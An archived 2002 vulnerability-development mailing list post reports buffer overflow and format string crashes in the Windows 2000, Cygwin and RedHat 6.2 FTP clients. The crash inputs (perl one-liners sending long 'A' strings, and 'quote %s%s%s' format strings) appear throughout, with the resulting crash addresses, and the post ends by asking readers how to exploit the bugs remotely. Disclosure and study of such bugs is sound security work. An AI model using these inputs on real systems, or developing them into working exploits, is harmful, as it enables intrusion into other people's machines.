Vulnerability Development mailing list archives
Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote?
From: "lion" <lion () cnhonker net>
Date: Mon, 6 May 2002 2:33:17 +0800
Multiple vuln-devLocal Vulnerabilities in some FTP Client.
1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability.
a.
d:\>perl -e "printf 'A'x3000"|ftp
Invalid command.
ftp>
will see the 0x4141414d memory addr not be read erroor.
d:\>perl -e "printf 'open '. 'A'x3000"|ftp
Already connected to (null), use disconnect first.
will see the 0x4141414d memory addr not be read erroor.
b.
d:\>ftp localhost
Connected to lion.
220 lion Microsoft FTP Service (Version 5.0).
User (lion:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> debug
Debugging On .
ftp> cd AAAAAAAAAA…… ('A' x 500)
500 Command was too long
421 Terminating connection.
Connection closed by remote host.
ftp> debug
Debugging On .
ftp> open localhost
Connected to lion.
220 lion Microsoft FTP Service (Version 5.0).
User (lion:(none)): ftp
---> USER ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
---> PASS f
230 Anonymous user logged in.
ftp> cd AAAAAAAAAAAAAAAA……('A'x 2000)
will see the 0x41414141 memory addr not be read erroor.
ftp> ls AAAAAAAAAAAAAAAA……('A'x 2000)
---> PORT 127,0,0,1,4,114
200 PORT command successful.
---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA……..
will see the 0x41414141 memory addr not be read erroor.
c.
d:\>ftp localhost
Connected to lion.
220 lion Microsoft FTP Service (Version 5.0).
User (lion:(none)): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
ftp> debug
Debugging On .
ftp> quote %s
---> quote %s
500 'QUOTE %s': command not understood
ftp> quote %s%s%s
---> quote %s%s%s?(null)
500 'QUOTE %s%s%s (null)': command not understood
ftp> quote %s%s%s%s%s%s%s%s
--->
will see the 0x73257325 memory addr not be read erroor.
Use W32Dasm isamssemble the ftp.exe, we can find the
780127A8 mov dword ptr [eax],ecx
This is a character with win2000 Format Strings Vulnerability.
2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability.
lion@LION ~
$ ftp localhost
Connected to lion.
220 lion Microsoft FTP Service (Version 5.0).
Name (localhost:lion): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 Anonymous user logged in.
Remote system type is Windows_NT.
ftp> debug
Debugging on (debug=1).
ftp> quote %s
---> %s
500 '%S': command not understood
ftp> quote %s%s%s%s%s%s%s
Segmentation fault (core dumped)
Who can exploit it by remote?
Sorry for my poor English.:)
Lion
lion () cnhonker net
HUC
Current thread:
- Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? lion (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? SpaceWalker (May 06)
- RE: Multiple Local Vulnerabilities in some FTP Client.Who can exploitit by remote? Brett Moore (May 06)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? SpaceWalker (May 05)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Frank Knobbe (May 08)
- Re: Multiple Local Vulnerabilities in some FTP Client.Who can exploit it by remote? Stan Bubrouski (May 05)